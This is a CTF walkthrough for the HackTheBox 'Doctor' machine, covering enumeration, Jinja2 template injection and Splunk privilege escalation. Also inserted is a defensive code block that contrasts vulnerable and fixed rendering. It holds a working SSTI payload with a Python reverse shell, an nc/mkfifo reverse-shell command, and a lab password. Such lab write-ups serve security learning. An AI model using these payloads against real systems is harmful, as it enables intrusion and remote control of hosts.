HackTheBox: (“Doctor”) — Walkthrough

Mohamed Elmasry
5 min read · Feb 6, 2021

Hi People :D

Today we’ll solve the “Doctor” machine from HackTheBox. Let’s get started

You can find all commands here

Info

Enumeration

— — — — — — —

Start with Nmap

nmap -A 10.10.10.209

We have ports 22, 80 and 8098 open

Web Enumeration

— — — — — — — —

Let’s check the website

http://10.10.10.209

I tried fuzzing this website using dirsearch but didn’t find anything useful. After some research I found another domain (“doctors.htb”), so I added this domain to the /etc/hosts file

Now let’s check this domain

Nice, we got a login page. Let’s make a new account

Log in with your credentials

It’s a blank page, so let’s try to make a New Message with a simple h1 tag

I didn’t know what this message was for until I ran dirsearch and found the archive page

./dirsearch -u http://doctors.htb/ -e "*" -x 404,403,500,501

When I visited archive, I found that it was a blank page

But when I checked the source code, I found that my message was reflected in it

Cool, let’s change this message a bit to print HI in archive

</title></item><h1>HI</h1>

We successfully executed our payload and confirmed that there was a Server-Side Template Injection (SSTI) bug (you can read more about it here)

Now let’s try a simple test for SSTI using a Jinja2 injection

Modify our message again

</title></item>{{7*'7'}}

Go back to archive, and our payload has executed successfully
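To show why the archive page evaluated our message, here is an added example (not from the original writeup, and not the machine's real code) contrasting the vulnerable rendering pattern with the hardened one, plus a small detection helper for reviewing stored messages. It assumes Jinja2 is installed; the archive item template is an assumption.

```python
# Added example: how the SSTI in the "archive" page arises and how to close it.
# Assumes Jinja2 is installed (pip install jinja2). The template is constructed
# for illustration, not taken from the machine.
from jinja2 import Environment

# Constructed sample messages, including the two probes used in the writeup.
SAMPLE_MESSAGES = [
    "hello doctors",
    "</title></item><h1>HI</h1>",
    "{{7*'7'}}",
]

# Assumed shape of one archive feed item (placeholder, not the real template).
ARCHIVE_ITEM = "<item><title>{title}</title></item>"


def render_archive_vulnerable(message: str) -> str:
    """Vulnerable pattern: the user's message is spliced into the template
    *source*, so Jinja2 evaluates any {{ ... }} / {% ... %} it contains."""
    source = ARCHIVE_ITEM.format(title=message)
    return Environment().from_string(source).render()


def render_archive_fixed(message: str) -> str:
    """Hardened pattern: the template source is a constant; user input only
    enters as a *variable*, and autoescape neutralises HTML/XML markup, so
    both the <h1> probe and {{7*'7'}} come back as inert text."""
    template = Environment(autoescape=True).from_string(
        "<item><title>{{ title }}</title></item>"
    )
    return template.render(title=message)


def looks_like_template_probe(message: str) -> bool:
    """Detection helper: flag stored messages carrying Jinja2 delimiters.
    Useful for reviewing existing content or alerting, not as the fix."""
    return "{{" in message or "{%" in message


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("probe?", looks_like_template_probe(msg))
        print("  vulnerable:", render_archive_vulnerable(msg))
        print("  fixed     :", render_archive_fixed(msg))
```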

It’s time for a final exploit :D

Exploitation

— — — — — —

Go back to the GitHub page; there is an RCE exploit using this bug

So let’s modify this payload, then update our message to get a shell

</title></item>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{Your_IP}\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Visit archive again and finally we get a shell as the web user :D

User Flag

— — — —

After some file enumeration, I found a backup file in /var/log/apache2 that contains a password

cat /var/log/apache2/backup | grep pass

I did some more enumeration and found the user Shaun; I tried this password with that account and we got the Shaun user

Simply do some improvements to your shell (optional), then read user.txt in the home directory :D

Root Flag

— — — —

It’s time for privilege escalation

First, upload LinPEAS to the machine, then run it

Let the script finish its work, then check the results: you will see a Splunk user

I searched for Splunk and found this article, then I tried to find any public privilege escalation exploit. Fortunately, I found this GitHub repo

We’re going to use PySplunkWhisperer2_remote.py

After downloading it, I tried using a simple Netcat reverse shell command as a payload, but it didn’t work, so I searched for another command and found this awesome website

Using this command as a payload, we successfully get our root shell.

The final command looks like this:

python3 PySplunkWhisperer2_remote.py --lhost {Your_IP} --host 10.10.10.209 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {Your_IP} 4444 >/tmp/f'

Very nice. The last step is to read root.txt, but I always like to do some improvements to my shell first with these commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=linux

Thanks for reading, and I hope you enjoyed this simple writeup ❤


Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analyst | Threat Hunter